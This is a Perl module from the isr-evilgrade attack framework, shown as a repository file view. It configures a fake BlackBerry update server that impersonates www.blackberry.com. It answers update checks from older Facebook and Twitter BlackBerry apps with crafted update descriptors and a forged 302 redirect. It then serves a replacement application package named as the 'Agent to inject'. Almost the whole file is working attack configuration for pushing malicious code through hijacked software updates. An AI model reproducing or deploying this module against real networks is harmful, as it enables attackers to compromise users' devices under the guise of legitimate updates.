blackberry.pm 3.9 KB
Newer Older
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126
###############
# blackberry.pm
#
# Copyright 2010 Francisco Amato
#
# This file is part of isr-evilgrade, www.infobytesec.com .
#
# isr-evilgrade is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation version 2 of the License.
#
# isr-evilgrade is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with isr-evilgrade; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
#
# '''
##
package modules::blackberry;

use strict;
use Data::Dump qw(dump);

use isrcore::utils;

my $base=
{
    'name' => 'Blackberry',
    'version' => '1.0',
    'appver'  => '< Facebook 1.7.0.22 | Twitter 1.0.0.45',
    'author' => [ 'Francisco Amato < famato +[AT]+ infobytesec.com>' ],
    'description' => qq{},    
    #rcp.na.blackberry.com
    'vh' => '(www.blackberry.com)',
    'request' => [
		    {
		    'req' => '/facebook.update', #regex friendly
		    'type' => 'file', #file|string|agent|install
		    'method' => '', #any
		    'bin'    => 0,
		    'string' => '',
		    'parse' => 1,
		    'file' => './include/blackberry/facebook.update',
		    },
		    {
		    'req' => '/net_rim_bb_twitter.jad', #regex friendly
		    'type' => 'file', #file|string|agent|install
		    'method' => '', #any
		    'bin'    => 0,
		    'string' => '',
		    'parse' => 1,
		    'file' => './include/blackberry/twitter.update',
		    },

                    {
                    'req' => '(/facebook/|/twitterdownload)', #regex anything
                    'type' => 'string', #file|string|agent|install
                    'method' => '', #any
                    'bin'    => '',
                    'string' => '',
                    'parse' => '1',
                    'file' => '',
                    'cheader' => "HTTP/1.1 302 Found\r\n"
                                 ."Location: http://www.blackberry.com/<%RND1%>update.jad \r\n"
                                 ."Content-Length: 0 \r\n"
                                 . "Connection: close \r\n\r\n",
                    },
		    
		    {
		    'req' => 'update.jad', #regex friendly
		    'type' => 'file', #file|string|agent|install
		    'method' => '', #any
		    'bin'    => '',		    
		    'string' => '',
		    'parse' => 0,
		    'file' => './agent/EkopartyWebIcon.jad',
                    'cheader' => "HTTP/1.1 200 OK\r\n"
                                 ."Content-type: text/vnd.sun.j2me.app-descriptor \r\n"
                                 ."Connection: close \r\n\r\n"
                                
		    },

		    {
		    'req' => '.cod', #regex friendly
		    'type' => 'agent', #file|string|agent|install
		    'method' => '', #any
		    'bin'    => 1,		    
		    'string' => '',
		    'parse' => 0,
		    'file' => ''
		    },

		    

    ],
    #Options		    
    'options' => {  'agent'  => { 'val' => './agent/EkopartyWebIcon.cod', 'desc' => 'Agent to inject'},
		    'enable' => { 'val' => 0, 
			    	  'desc' => 'Status'},
                    'version'  => { 'val' => '\'7.\'.isrcore::utils::RndNum(2)',
                                  'hidden' => 1,
                                'dynamic' =>1,
				},
                    'rnd1'  => { 'val' => 'isrcore::utils::RndNum(5)',
                                  'hidden' => 1,
                                'dynamic' =>1,
                            }			    	  
		 }
};

##########################################################################
# FUNCTION      new
# RECEIVES
# RETURNS
# EXPECTS
# DOES          class's constructor
sub new {
    my $class = shift;
    my $self = { 'Base' => $base, @_ };
    return bless $self, $class;
}            
1;